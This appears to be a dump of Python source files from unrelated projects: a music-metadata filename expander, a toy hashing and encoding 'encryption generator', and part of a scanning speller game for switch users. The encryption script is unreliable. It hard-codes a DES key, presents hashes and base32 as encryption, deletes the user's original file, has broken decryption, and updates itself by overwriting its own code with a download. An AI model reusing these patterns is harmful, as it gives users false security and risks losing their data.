    ...             'title': 'Bar',
    ...             'tracknumber': '1',
    ...             'album': 'Album',
    ...             'location': 'file:///%E6%AD%8C%E6%9B%B2/%E7%9A%84/%E5%9C%B0%E5%9D%80.mp3'}
    >>> expand_file('%p - %t', metadata)
    'Foo - Bar'
    >>> expand_file('foobar', metadata)
    'foobar'
    >>> print expand_file('name is %f :)', metadata)
    name is 地址 :)
    >>> expand_file('%something else', metadata)
    '%something else'
    >>> expand_file('%%a - %%t', metadata)
    '%a - %t'
    >>> expand_file('%%%', metadata)
    '%%'
    >>> expand_file('%n - %a:%p,%t', metadata)
    '1 - Album:Foo,Bar'
    >>> expand_file('%t', {})
    Traceback (most recent call last):
      ...
    PatternException: 'title not in metadata'
    """
    start = 0
    parts = []
    while start < len(pattern):
        end = pattern.find('%', start)
        if end > -1:
            parts.append(pattern[start:end])
            has_tag = False
            if end + 1 < len(pattern):
                tag = pattern[end + 1]
                if tag == '%':
                    # literal percent sign
                    has_tag = True
                    parts.append('%')
                elif tag == 'f':
                    location = _metadata_value(metadata, ('location',))
                    if not location:
                        raise PatternException('Location not found in metadata')
                    uri = urlparse.urlparse(location)
                    if uri.scheme != '' and not uri.scheme in ['file']:
                        raise PatternException('Unsupported file scheme %s' % uri.scheme)
                    if uri.scheme == '':
                        path = uri.path
                    else:
                        # decode %XX escapes in file:// URIs
                        path = urllib.url2pathname(uri.path)
                    basename = os.path.basename(path)
                    root = os.path.splitext(basename)[0]
                    has_tag = True
                    parts.append(root)
                elif tag in _TAG_KEYS:
                    value = _metadata_value(metadata, _TAG_KEYS[tag])
                    if not value:
                        raise PatternException('%s not in metadata' % _TAG_KEYS[tag][0])
                    has_tag = True
                    parts.append(value)
            if has_tag:
                start = end + 2
            else:
                # unknown tag: keep the '%' literally
                start = end + 1
                parts.append('%')
        else:
            parts.append(pattern[start:])
            break
    return ''.join(parts)


def expand_path(pattern, metadata):
    """
    Expands the pattern to a directory path according to the infomation of a music

    The pattern can be one of the three forms:
     - begin with `/': the path is an absolute path and will not be expanded
     - begin with `~/': the path is an relative path and the `~' wiil be expanded
       to the absolute path of the user's home directory
     - `%': the path will be expanded to the directory of the music file according
       to its URI. ``location`` attribute is used in metadata

    Arguments:
     - `pattern`: The pattern to expand.
     - `metadata`: A dict representing metadata. Useful keys are listed above.

    If the pattern cannot be expand, raise an PatternException. Otherwise return
    the expended pattern.

    >>> expand_path('%', {'location': 'file:///tmp/a.lrc'})
    '/tmp'
    >>> expand_path('%foo', {'location': 'file:///tmp/a.lrc'})
    '%foo'
    >>> expand_path('/bar', {})
    '/bar'
    >>> expand_path('%', {'Title': 'hello'})
    Traceback (most recent call last):
      ...
    PatternException: 'Location not found in metadata'
    """
    if pattern == '%':
        location = _metadata_value(metadata, ('location',))
        if not location:
            raise PatternException('Location not found in metadata')
        uri = urlparse.urlparse(location)
        if not uri.scheme in ['file']:
            raise PatternException('Unsupported file scheme %s' % uri.scheme)
        path = urllib.url2pathname(uri.path)
        return os.path.dirname(path)
    # '~' (if any) expands to the user's home directory; absolute and other
    # relative patterns pass through unchanged
    return os.path.expanduser(pattern)

if __name__ == '__main__':
    import doctest
    doctest.testmod()
P1d0f/encryptGen
encryption-generator.py
#!/usr/bin/env python # -*- coding: utf-8 -*- # # encryption-generator.py # # Copyright 2016 Netuser <zorgonteam@gmail.com> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, # MA 02110-1301, USA. # encryption-generator.py Version 2.0 # site http://zorgonteam.wordpress.com import os import sys import time import base64 import urllib import hashlib import subprocess from datetime import date from datetime import datetime from Crypto.Cipher import DES from Crypto import Random date=date.today() now=datetime.now() if os.name in ['nt','win32']: os.system('cls') else: os.system('clear') print "[*] Author Netuser [*]" print "[*] encryption generator [*]" print "[*] date :",date," [*]" print print "[*] Encrypt With Strong Crypto is Coming soon" back = 'back' #while back == 'back': while True: try: menu=raw_input('\n[*] encrypt or decrypt $ ') menu_item="update" if menu_item == menu: print "[*] Updating Databases Information .... 
" url=urllib.urlretrieve("https://raw.githubusercontent.com/P1d0f/encryptGen/master/encryption-generator.py","encryption-generator.py") print "[*] Update Succesfully" sys.exit() menu_item="help" if menu == menu_item: print """ you just type encrypt or decrypt example : encrypt = encrypt or decrypt $ encrypt (enter) decrypt = encrypt or decrypt $ decrypt (enter) """ menu_item="encrypt" if menu == menu_item: print print "----> md5" print "----> sha1" print "----> sha224" print "----> sha256" print "----> sha384" print "----> sha512" print "----> base16" print "----> base32" print "----> base64" print "----> cryptoDES" print raw=raw_input('[*] type and choice one $ ') menu_item="exit" if raw == menu_item: print "[*] thanks for shopping" sys.exit() menu_item="cryptoDES" if menu_item == raw: telo=raw_input('[*] your text $ ') iv=Random.get_random_bytes(8) des1=DES.new('01234567', DES.MODE_CFB, iv) des2=DES.new('01234567', DES.MODE_CFB, iv) text=telo cipher_text=des2.encrypt(text) nama_file=open('text.encrypt','w') nama_file.writelines(cipher_text) nama_file.close() time.sleep(2) for i in(5,4,3,2,1): print "[*] encrypted at",now print "\n[*] saved into text.encrypt" menu_item="base16" if menu_item == raw: telo=raw_input('[*] text $ ') base16=base64.b16encode('%s' % (telo)) for i in(5,4,3,2,1): print "[*] encoded at",now print "\n[*] result :",base16 menu_item="sha224" if menu_item == raw: telo=raw_input('[*] text $ ') sha224=hashlib.sha224('%s' % (telo)).hexdigest() for i in(5,4,3,2,1): print "[*] encrypted at",now print "\n[*] result :",sha224 menu_item="sha384" if menu_item == raw: telo=raw_input('[*] text $ ') sha384=hashlib.sha384('%s' % (telo)).hexdigest() for i in(5,4,3,2,1): print "[*] encrypted at",now print "\n[*] result :",sha384 menu_item="sha512" if menu_item == raw: telo=raw_input('[*] text $ ') sha512=hashlib.sha512('%s' % (telo)).hexdigest() for i in(5,4,3,2,1): print "[*] encrypted at",now print "\n[*] result :",sha512 menu_item="base64" if menu_item == 
raw: telo=raw_input('[*] text $ ') base64=base64.b64encode('%s' % (telo)) for i in(5,4,3,2,1): print "[*] encoded at",now print "\n[*] result :",base64 menu_item="md5" if menu_item == raw: telo=raw_input('[*] text $ ') md5=hashlib.md5('%s' % (telo)).hexdigest() for i in(1,2,3,4,5): print "[*] encrypted at",now print "\n[*] result :",md5 menu_item="sha256" if menu_item == raw: telo=raw_input('[*] text $ ') sha256=hashlib.sha256('%s' % (telo)).hexdigest() print for i in(1,2,3,4,5): print "[*] encrypted at",now print "\n[*] result :",sha256 menu_item="sha1" if menu_item == raw: telo=raw_input('[*] text $ ') sha1=hashlib.sha1('%s' % (telo)).hexdigest() print for i in(1,2,3,4,5): print "[*] encrypted at",now print "\n[*] result :",sha1 menu_item="base32" if menu_item == raw: ff=raw_input('[*] text or file $ ') menu_fuck="text" if menu_fuck == ff: telo=raw_input('text $ ') base32=base64.b32encode('%s' % (telo)) print for i in(1,2,3,4,5): print "[*] encoded at",now print "\n[*] result :",base32 menu_ss="file" if menu_ss == ff: try: print "[*] WARNING : if you encrypt this file your file original will be remove !" 
fileno=raw_input('\n[*] file to encrypt $ ') baca=open('%s' % (fileno), 'r') ss=baca.read() decrypt=base64.b32encode(ss) simpan=open('text.enc','w') simpan.writelines(decrypt) simpan.close() time.sleep(2) for i in(5,4,3,2,1): print "[*] encoded at",now print "\n[*] saved to text.enc" os.remove(fileno) except IOError: print "\n[*] no file found",fileno sys.exit() menu_telo="decrypt" if menu_telo == menu: print print "----> base16" print "----> base32" print "----> base64" print "----> cryptoDES" print oke=raw_input('[*] type and choice one $ ') menu_telo="cryptoDES" if menu_telo == oke: try: telo=raw_input('[*] file.encrypt : ') iv=Random.get_random_bytes(8) des1=DES.new('01234567', DES.MODE_CFB, iv) des2=DES.new('01234567', DES.MODE_CFB, iv) nama_file=open('%s' % (telo),'r') ss=nama_file.read() decs=des2.decrypt(ss) save1=open('text.decrypt','w') save1.writelines(decs) save1.close() time.sleep(2) for i in(5,4,3,2,1): print "[*] decrypted at",now print "\n[*] saved file text.decrypt" except IOError: print "\n[*] Not found file encrypt",telo menu_telo="base16" if oke == menu_telo: raw1=raw_input('[*] text base16 $ ') dec16=base64.b16decode('%s' % (raw1)) for i in(5,4,3,2,1): print "[*] decoded at",now print "\n[*] result :",dec16 menu_telo="base32" if oke == menu_telo: ss=raw_input('[*] text or file $ ') menu_gg="text" if menu_gg == ss: raw2=raw_input('[*] text base32 $ ') print dec32=base64.b32decode('%s' % (raw2)) for i in(5,4,3,2,1): print "[*] decoded at",now print "\n[*] result :",dec32 menu_hh="file" if menu_hh == ss: try: fileno=raw_input('[*] file text.enc $ ') print fuck=open('%s' % (fileno), 'r') anjir=fuck.read() dec43=base64.b32decode(anjir) telo=open('text.dec','w') telo.writelines(dec43) telo.close() time.sleep(2) for i in(5,4,3,2,1): print "[*] decoded at",now print "\n[*] save file text.dec" os.remove(fileno) except: print "[*] Not found file enc " menu_telo="base64" #this is Bug Sorry if oke == menu_telo:# raw3=raw_input('[*] text base64 $ ')# 
dec64=base64.b64decode('%s' % (raw3))# for i in (5,4,3,2,1):# print "[*] decoded at",now# print "\n[*] result :",dec64# menu_telo="exit" if menu_telo == oke: print "[*] thanks for shopping" sys.exit() menu_item="exit" if menu == menu_item: print "[*] thanks for shopping" sys.exit() except KeyboardInterrupt: print "\n[*] ctrl+c active " sys.exit() ##### Finished #################################### Finished ################## ############################################################################### #the Bug is cannot decrypt crypto encryption but i will try to repair and make# #progam is the best ever #you can wait this progam to be version 2.0 #
bjura/EPlatform
spellerPuzzle.py
#!/bin/env python2.7
# -*- coding: utf-8 -*-

# This file is part of AT-Platform.
#
# EPlatform is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# EPlatform is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EPlatform. If not, see <http://www.gnu.org/licenses/>.

import wxversion
wxversion.select( '2.8' )
import glob, os, time
import wx, alsaaudio
import wx.lib.buttons as bt
from pymouse import PyMouse
from string import maketrans
from pygame import mixer
import subprocess as sp
import shlex

import numpy as np
from random import shuffle

#=============================================================================
class speller( wx.Frame ):
    """Single-switch scanning speller puzzle.

    Shows the letters of the puzzle word (self.parent.word) shuffled on a
    virtual keyboard; a timer (driven by the parent's ``stoper2``) scans the
    active keys and a single press selects the highlighted one.  Reads its
    colours/timing from the 'spellerParameters', 'parametersCW' and
    'parameters' text files in the working directory.
    """

    def __init__(self, parent):
        self.parent = parent
        self.initializeParameters( )
        self.initializeBitmaps( )
        self.createGui( )

    #-------------------------------------------------------------------------
    def initializeParameters(self):
        """Load colours, timing and the puzzle word; set up sounds and state.

        Each parameter file holds ``name = value`` lines; unknown non-blank
        lines are reported (in Polish) and built-in defaults are used.
        """
        self.pathToEPlatform = './'
        with open( self.pathToEPlatform + 'spellerParameters', 'r' ) as parametersFile:
            for line in parametersFile:
                if line[ :line.find('=')-1 ] == 'polishLettersColour':
                    self.polishLettersColour = line[ line.rfind('=')+2:-1 ]
                elif line[ :line.find('=')-1 ] == 'voice':
                    pass
                elif line[ :line.find('=')-1 ] == 'vowelColour':
                    self.vowelColour= line[ line.rfind('=')+2:-1 ]
                elif not line.isspace( ):
                    # malformed line: report it and fall back to defaults
                    print '\nNiewłaściwie opisany parametr. Błąd w linii:\n%s' % line
                    self.vowelColour = 'red'
                    self.polishLettersColour = 'blue'
        with open( self.pathToEPlatform + 'parametersCW', 'r' ) as parametersFile:
            # only ileLuk used to matter here; all options are currently ignored
            for line in parametersFile:
                if line[ :line.find('=')-1 ] == 'textSize':
                    pass
                elif line[ :line.find('=')-1 ] == 'checkTime':
                    pass
                elif line[ :line.find('=')-1 ] == 'maxPoints':
                    pass
                elif line[ :line.find('=')-1 ] == 'colorGrat':
                    pass
                elif line[ :line.find('=')-1 ] == 'colorNiest':
                    pass
                elif line[ :line.find('=')-1 ] == 'ileLuk':
                    pass
                    #self.ileLuk= int(line[ line.rfind('=')+2:-1 ])
                elif not line.isspace( ):
                    print 'Niewłaściwie opisane parametry'
                    print 'Błąd w linii', line
                    #self.ileLuk=2
        with open( self.pathToEPlatform + 'parameters', 'r' ) as parametersFile:
            for line in parametersFile:
                if line[ :line.find('=')-1 ] == 'timeGap':
                    # scanning interval in milliseconds
                    self.timeGap = int( line[ line.rfind('=')+2:-1 ] )
                elif line[ :line.find('=')-1 ] == 'backgroundColour':
                    self.backgroundColour = line[ line.rfind('=')+2:-1 ]
                elif line[ :line.find('=')-1 ] == 'textColour':
                    self.textColour = line[ line.rfind('=')+2:-1 ]
                elif line[ :line.find('=')-1 ] == 'scanningColour':
                    self.scanningColour = line[ line.rfind('=')+2:-1 ]
                elif line[ :line.find('=')-1 ] == 'selectionColour':
                    self.selectionColour = line[ line.rfind('=')+2:-1 ]
                elif line[ :line.find('=')-1 ] == 'musicVolume':
                    pass
                elif line[ :line.find('=')-1 ] == 'filmVolume':
                    pass
                elif not line.isspace( ):
                    print '\nNiewłaściwie opisany parametr. Błąd w linii:\n%s' % line
                    self.timeGap = 1500
                    self.backgroundColour = 'white'
                    self.textColour = 'black'
                    self.scanningColour = '#E7FAFD'
                    self.selectionColour = '#9EE4EF'
        # labels[0] is the letter board, labels[1] the special-character board
        self.labels = [ 'a e b c d f g h i o j k l m n p u y r s t w z SPECIAL_CHARACTERS DELETE TRASH CHECK ORISPEAK SPEAK EXIT'.split( ), '1 2 3 4 5 6 7 8 9 0 + - * / = % $ & . , ; : " ? ! @ # ( ) [ ] { } < > ~ DELETE TRASH CHECK ORISPEAK SPEAK EXIT'.split( ) ]
        self.colouredLabels = [ 'a','e','i','o','u','y']
        self.winWidth, self.winHeight = wx.DisplaySize( )
        self.voice=False
        # the word to be spelled, provided by the parent frame
        self.slowo=self.parent.word
        self.ileLiter =len(self.slowo)
        #if self.ileLuk >=len(self.slowo):
            #self.ileLuk=len(self.slowo)-1
        self.numberOfRows = [4, 5 ]
        self.numberOfColumns = [ 8, 9 ]
        #self.flag = 'row'
        #self.rowIteration = 0
        #self.columnIteration = 0
        #self.countRows = 0
        #self.countColumns = 0
        # index of the key currently highlighted by the scanner
        self.kolejnyKrok=0
        #self.maxNumberOfColumns = 2
        self.numberOfPresses = 1
        self.subSizerNumber = 0
        self.mouseCursor = PyMouse( )
        mixer.init( )
        self.typewriterKeySound = mixer.Sound( self.pathToEPlatform+'sounds/typewriter_key.wav' )
        self.typewriterForwardSound = mixer.Sound( self.pathToEPlatform+'sounds/typewriter_forward.wav' )
        self.typewriterSpaceSound = mixer.Sound( self.pathToEPlatform+'sounds/typewriter_space.wav' )
        # per-letter phone sounds; the label is the file name up to the '_'
        self.phones = glob.glob( self.pathToEPlatform+'sounds/phone/*' )
        self.phoneLabels = [ item[ item.rfind( '/' )+1 : item.rfind( '_' ) ] for item in self.phones ]
        self.sounds = [ mixer.Sound( self.sound ) for self.sound in self.phones ]
        self.parent.SetBackgroundColour( 'dark grey' )

    #-------------------------------------------------------------------------
    def initializeBitmaps(self):
        """Load the icon bitmaps for the non-letter keys of both boards."""
        self.path=self.pathToEPlatform+'multimedia/'
        labelFiles = [ file for file in [ self.path+'icons/speller/special_characters.png', self.path+'icons/speller/DELETE.png', self.path+'icons/speller/TRASH.png', self.path+'icons/speller/CHECK.png',self.path+'icons/speller/ORISPEAK.png', self.path+'icons/speller/SPEAK.png', self.path+'icons/speller/exit.png', ] ]
        self.labelBitmaps = { }
        # the last 7 labels of board 0 are the icon keys
        labelBitmapIndex = [ self.labels[ 0 ].index( self.labels[ 0 ][ -7 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -6 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -5 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -4 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -3 ] ),self.labels[ 0 ].index( self.labels[ 0 ][ -2 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -1 ] ) ]
        for labelFilesIndex, labelIndex in enumerate( labelBitmapIndex ):
            self.labelBitmaps[ self.labels[ 0 ][ labelIndex ] ] = wx.BitmapFromImage( wx.ImageFromStream( open( labelFiles[ labelFilesIndex ], 'rb' )) )
        self.labelBitmaps2 = { }
        # board 1 has no SPECIAL_CHARACTERS key, hence only 6 icons
        labelBitmapIndex2 = [ self.labels[ 1 ].index( self.labels[ 1 ][ -6 ] ), self.labels[ 1 ].index( self.labels[ 1 ][ -5 ] ), self.labels[ 1 ].index( self.labels[ 1 ][ -4 ] ), self.labels[ 1 ].index( self.labels[ 1 ][ -3 ] ),self.labels[ 1 ].index( self.labels[ 1 ][ -2 ] ), self.labels[ 1 ].index( self.labels[ 1 ][ -1 ] ) ]
        for labelFilesIndex2, labelIndex2 in enumerate( labelBitmapIndex2 ):
            self.labelBitmaps2[ self.labels[ 1 ][ labelIndex2 ] ] = wx.BitmapFromImage( wx.ImageFromStream( open( labelFiles[ 1: ][ labelFilesIndex2 ], 'rb' )) )

    #-------------------------------------------------------------------------
    def createGui(self):
        """Build the text field and both keyboards; activate only the keys
        holding the (shuffled) letters of the puzzle word plus one decoy."""
        self.textField = wx.TextCtrl( self.parent, style = wx.TE_LEFT|wx.TE_RICH2, size = ( self.winWidth, 0.2 * self.winHeight ) )
        self.textField.SetFont( wx.Font( 60, wx.SWISS, wx.NORMAL, wx.NORMAL ) )
        self.parent.mainSizer.Add( self.textField, flag = wx.EXPAND | wx.TOP | wx.BOTTOM, border = 3 )
        self.subSizers = [ ]
        subSizer = wx.GridBagSizer( 3, 3 )
        # board positions of the letters of the puzzle word
        self.pomieszane=[]
        for i in self.slowo:
            self.pomieszane.append(self.labels[0].index(i))
        shuffle(self.pomieszane)
        #print self.pomieszane
        # drop duplicate positions (repeated letters share one key)
        for litera in self.pomieszane:
            if self.pomieszane.count(litera) > 1:
                self.pomieszane.remove(litera)
        # add one random decoy key among the letter rows
        zakres=(self.numberOfRows[0]-1)* self.numberOfColumns[0] -1
        print zakres
        dodaj=np.random.randint(0,zakres,1)[0]
        while dodaj in self.pomieszane:
            dodaj=np.random.randint(0,zakres,1)[0]
        self.pomieszane.append(dodaj)
        # scatter the shuffled letters of the word over the active keys
        slowoList=list(self.slowo)
        shuffle(slowoList)
        zmieszane_slowo= ''.join(slowoList)
        #print zmieszane_slowo
        for i in self.pomieszane:
            self.labels[0][i]=zmieszane_slowo[-1]
            zmieszane_slowo=zmieszane_slowo[:-1]
        self.pomieszane.sort()
        ile=0
        for index_1, item in enumerate( self.labels[ 0 ][ :-7 ] ):
            ile+=1
            b = bt.GenButton( self.parent, -1, item , name = item+str(ile), size = ( 0.985*self.winWidth / self.numberOfColumns[ 0 ], 0.79 * self.winHeight / self.numberOfRows[ 0 ] ) )
            b.SetFont( wx.Font( 100, wx.FONTFAMILY_ROMAN, wx.FONTWEIGHT_LIGHT, False ) )
            b.SetBezelWidth( 3 )
            # inactive keys are greyed out; active ones use the configured colours
            if index_1 not in self.pomieszane:
                b.SetBackgroundColour( 'grey' )
            else:
                b.SetBackgroundColour( self.backgroundColour )
            if item in self.colouredLabels and self.vowelColour != 'False':
                if index_1 not in self.pomieszane:
                    b.SetForegroundColour( 'grey' )
                else:
                    b.SetForegroundColour( self.vowelColour )
            else:
                if index_1 not in self.pomieszane:
                    b.SetForegroundColour( 'grey' )
                else:
                    b.SetForegroundColour( self.textColour )
            b.Bind( wx.EVT_LEFT_DOWN, self.onPress )
            subSizer.Add( b, ( index_1 / self.numberOfColumns[ 0 ], index_1 % self.numberOfColumns[ 0 ] ), wx.DefaultSpan, wx.EXPAND )
        for index_2, item in enumerate( self.labels[ 0 ][ -7 : ] ):
            if item == 'SPECIAL_CHARACTERS':
                # disabled in the puzzle variant
                b = bt.GenButton( self.parent, -1, item, name = item, size = ( 0.985*self.winWidth / self.numberOfColumns[ 0 ], 0.79 * self.winHeight / self.numberOfRows[ 0 ] ) )
                b.SetFont( wx.Font( 100, wx.FONTFAMILY_ROMAN, wx.FONTWEIGHT_LIGHT, False ) )
                b.SetForegroundColour( 'grey' )
                b.SetBackgroundColour( 'grey' )
            else:
                b = bt.GenBitmapButton( self.parent, -1, bitmap = self.labelBitmaps[ item ] )
                b.SetBackgroundColour( self.backgroundColour )
            b.SetBezelWidth( 3 )
            b.Bind( wx.EVT_LEFT_DOWN, self.onPress )
            # index_2 == 3 is the CHECK key, which spans three columns
            if index_2==3:
                subSizer.Add( b, ( ( index_1 + index_2 +1) / self.numberOfColumns[ 0 ], ( index_1 + index_2+1 ) % self.numberOfColumns[ 0 ] ), (1,3), wx.EXPAND )
            elif index_2>3:
                subSizer.Add( b, ( ( index_1 + index_2 +3) / self.numberOfColumns[ 0 ], ( index_1 + index_2 +3) % self.numberOfColumns[ 0 ] ), wx.DefaultSpan, wx.EXPAND )
            else:
                subSizer.Add( b, ( ( index_1 + index_2+1 ) / self.numberOfColumns[ 0 ], ( index_1 + index_2 +1) % self.numberOfColumns[ 0 ] ), wx.DefaultSpan, wx.EXPAND )
        self.subSizers.append( subSizer )
        self.parent.mainSizer.Add( self.subSizers[ 0 ], proportion = 1, flag = wx.EXPAND )
        self.parent.SetSizer( self.parent.mainSizer )
        # second (special characters) board -- built but kept hidden
        subSizer2 = wx.GridBagSizer( 3, 3 )
        for index_1, item in enumerate( self.labels[ 1 ][ :-6 ] ):
            b = bt.GenButton( self.parent, -1, item, name = item, size = ( 0.985*self.winWidth / self.numberOfColumns[ 1 ], 0.75 * self.winHeight / self.numberOfRows[ 1 ] ) )
            b.SetFont( wx.Font( 100, wx.FONTFAMILY_ROMAN, wx.FONTWEIGHT_LIGHT, False ) )
            b.SetBezelWidth( 3 )
            b.SetBackgroundColour( self.backgroundColour )
            b.SetForegroundColour( self.textColour )
            b.Bind( wx.EVT_LEFT_DOWN, self.onPress )
            subSizer2.Add( b, ( index_1 / self.numberOfColumns[ 1 ], index_1 % self.numberOfColumns[ 1 ] ), wx.DefaultSpan, wx.EXPAND )
        for index_2, item in enumerate( self.labels[ 1 ][ -6 : ] ):
            b = bt.GenBitmapButton( self.parent, -1, bitmap = self.labelBitmaps2[ item ] )
            b.SetBackgroundColour( self.backgroundColour )
            b.SetBezelWidth( 3 )
            b.Bind( wx.EVT_LEFT_DOWN, self.onPress )
            # index_2 == 2 is the CHECK key on this board; it spans four columns
            if index_2==2:
                subSizer2.Add( b, ( ( index_1 + index_2 +1) / self.numberOfColumns[ 1 ], ( index_1 + index_2 +1) % self.numberOfColumns[ 1 ] ), (1,4), wx.EXPAND )
            elif index_2>2:
                subSizer2.Add( b, ( ( index_1 + index_2 +4) / self.numberOfColumns[ 1], ( index_1 + index_2+4 ) % self.numberOfColumns[ 1 ] ), wx.DefaultSpan, wx.EXPAND )
            else:
                subSizer2.Add( b, ( ( index_1 + index_2+1 ) / self.numberOfColumns[ 1 ], ( index_1 + index_2 +1) % self.numberOfColumns[ 1 ] ), wx.DefaultSpan, wx.EXPAND )
        self.subSizers.append( subSizer2 )
        self.parent.mainSizer.Add( self.subSizers[ 1 ], proportion = 1, flag = wx.EXPAND )
        self.parent.mainSizer.Show( item = self.subSizers[ 1 ], show = False, recursive = True )
        self.parent.SetSizer( self.parent.mainSizer )
        # scanning order: the active letter keys plus the six icon keys
        ikony=range(self.numberOfColumns[0]*self.numberOfRows[0]-8,self.numberOfColumns[0]*self.numberOfRows[0]-2)
        self.ktore=self.pomieszane
        for i in ikony:
            self.ktore.append(i)
        self.parent.Layout()
        # keys already used for typed letters (removed from the scan cycle)
        self.usuniete=[]

    def onExit(self):
        """Stop scanning and return control to the parent frame."""
        self.parent.PicNr-=1
        self.parent.stoper2.Stop( )
        self.parent.back()

    def czytajLitere(self,litera):
        """Play the recorded phone sound matching *litera*."""
        time.sleep(1)
        # phone files are named with the upper-case letter, hence swapcase()
        soundIndex = self.phoneLabels.index( [ item for item in self.phoneLabels if litera.swapcase() in item ][ 0 ] )
        sound = self.sounds[ soundIndex ]
        sound.play( )
        self.parent.SetFocus()

    #----------------------------------------------------------------------------
    def onPress(self, event):
        """Handle the single-switch press: act on the currently scanned key.

        ``kolejnyKrok - 1`` is the key highlighted by the last timer tick.
        Only the first press per scan interval is honoured (numberOfPresses).
        """
        self.numberOfPresses += 1
        if self.numberOfPresses == 1:
            label = self.labels[ 0 ][self.ktore[self.kolejnyKrok-1]]
            item = self.subSizers[ 0 ].GetChildren()
            b = item[self.ktore[self.kolejnyKrok-1]]
            b=b.GetWindow( )
            if label != 'SPEAK':
                b.SetBackgroundColour( self.selectionColour )
            else:
                pass
            b.SetFocus( )
            b.Update( )
            if label in self.slowo:
                # a correct letter: type it and retire its key from the scan
                self.typewriterKeySound.play()
                self.textField.WriteText(label)
                item = self.subSizers[ 0 ].GetChildren()
                b = item[self.ktore[self.kolejnyKrok-1]]
                b=b.GetWindow( )
                b.SetBackgroundColour( 'grey' )
                b.SetForegroundColour('grey')
                b.SetFocus( )
                b.Update( )
                self.usuniete.append(self.ktore[self.kolejnyKrok-1])
                self.ktore.remove( self.ktore[self.kolejnyKrok-1] )
                self.kolejnyKrok=0
            elif label == 'DELETE':
                # undo the most recent letter: restore its key and colours
                text=self.textField.GetValue()
                if text:
                    self.typewriterForwardSound.play( )
                    item = self.subSizers[ 0 ].GetChildren()
                    b = item[self.usuniete[-1]]
                    b=b.GetWindow( )
                    b.SetBackgroundColour( self.backgroundColour)
                    if self.labels[0][self.usuniete[-1]] in self.colouredLabels:
                        b.SetForegroundColour( self.vowelColour )
                    else:
                        b.SetForegroundColour( self.textColour )
                    b.SetFocus( )
                    b.Update( )
                    self.ktore.append(self.usuniete[-1])
                    self.ktore.sort()
                    self.usuniete.remove( self.usuniete[-1] )
                    self.textField.Remove(self.textField.GetInsertionPoint()-1, self.textField.GetInsertionPoint())
                    self.kolejnyKrok=0
                else:
                    pass
            elif label == 'SPEAK':
                # toggle letter read-aloud mode; red key indicates it is on
                if not self.voice:
                    self.voice=True
                    b.SetBackgroundColour('indian red')
                    b.SetFocus( )
                    b.Update()
                else:
                    b.SetBackgroundColour(self.backgroundColour)
                    b.SetFocus( )
                    b.Update()
                    self.voice=False
            elif label == 'ORISPEAK':
                # speak the whole puzzle word: build (once, via sox) and play
                # a spelling .ogg for it
                self.parent.stoper2.Stop()
                if str(self.parent.word)+'.ogg' not in os.listdir(self.pathToEPlatform+'multimedia/spelling/'):
                    command='sox -m '+self.pathToEPlatform+'sounds/phone/'+list(self.parent.word)[0].swapcase()+'.wav'
                    ile=0
                    for l in list(self.parent.word)[1:]:
                        ile+=2
                        command+=' "|sox '+self.pathToEPlatform+'sounds/phone/'+l.swapcase()+'.wav'+' -p pad '+str(ile)+'"'
                    command+=' '+self.pathToEPlatform+'multimedia/spelling/'+self.parent.word+'.ogg'
                    wykonaj=sp.Popen(shlex.split(command))
                time.sleep(1.5)
                do_literowania=mixer.Sound(self.pathToEPlatform+'multimedia/spelling/'+self.parent.word+'.ogg')
                do_literowania.play()
                self.parent.stoper4.Start((do_literowania.get_length()+0.5 )* 1000)
            elif label == 'TRASH':
                # clear the whole text field and restore every retired key
                text=self.textField.GetValue()
                if text:
                    self.typewriterForwardSound.play()
                    self.textField.Remove(0,self.textField.GetInsertionPoint())
                    for litera in self.usuniete:
                        item = self.subSizers[ 0 ].GetChildren()
                        b = item[litera]
                        b=b.GetWindow( )
                        b.SetBackgroundColour( self.backgroundColour)
                        if self.labels[0][litera] in self.colouredLabels:
                            b.SetForegroundColour( self.vowelColour )
                        else:
                            b.SetForegroundColour( self.textColour )
                        #print self.usuniete,self.ktore
                        b.SetFocus( )
                        b.Update( )
                    while self.usuniete:
                        self.ktore.append(self.usuniete[-1])
                        self.ktore.sort()
                        self.usuniete.remove(self.usuniete[-1] )
                    self.kolejnyKrok=0
                else:
                    pass
            elif label == 'EXIT':
                self.onExit( )
            elif label =='CHECK':
                # hand the typed word back to the parent for verification
                self.parent.stoper2.Stop()
                self.parent.ownWord=self.textField.GetValue()
                self.parent.check()
            else:
                pass
        else:
            event.Skip( )

    #-------------------------------------------------------------------------
    def timerUpdate(self, event):
        """Timer tick: advance the scan highlight to the next active key.

        Also parks the mouse cursor in the screen corner and, in voice mode,
        reads the highlighted letter aloud.
        """
        self.mouseCursor.move( self.winWidth - 12, self.winHeight - 20 )
        self.numberOfPresses = 0
        # repaint all active keys with their idle colour first
        for i in self.ktore:
            if self.voice and i == self.numberOfRows[0]*self.numberOfColumns[0]-4:
                # the SPEAK key stays red while voice mode is on
                items = self.subSizers[ 0 ].GetChildren()
                b = items[i]
                b=b.GetWindow( )
                b.SetBackgroundColour( 'indian red')
                b.SetFocus( )
                b.Update( )
            else:
                items = self.subSizers[ 0 ].GetChildren()
                b = items[i]
                b=b.GetWindow( )
                b.SetBackgroundColour( self.backgroundColour )
                b.SetFocus( )
                b.Update( )
        # then highlight the key the scanner is currently on
        if self.voice and self.ktore[self.kolejnyKrok] == self.numberOfRows[0]*self.numberOfColumns[0]-4:
            item = self.subSizers[ 0 ].GetChildren()
            b = item[self.ktore[self.kolejnyKrok]]
            b=b.GetWindow( )
            b.SetBackgroundColour( 'orange red')
            b.SetFocus( )
            b.Update( )
        else:
            item = self.subSizers[ 0 ].GetChildren()
            b = item[self.ktore[self.kolejnyKrok]]
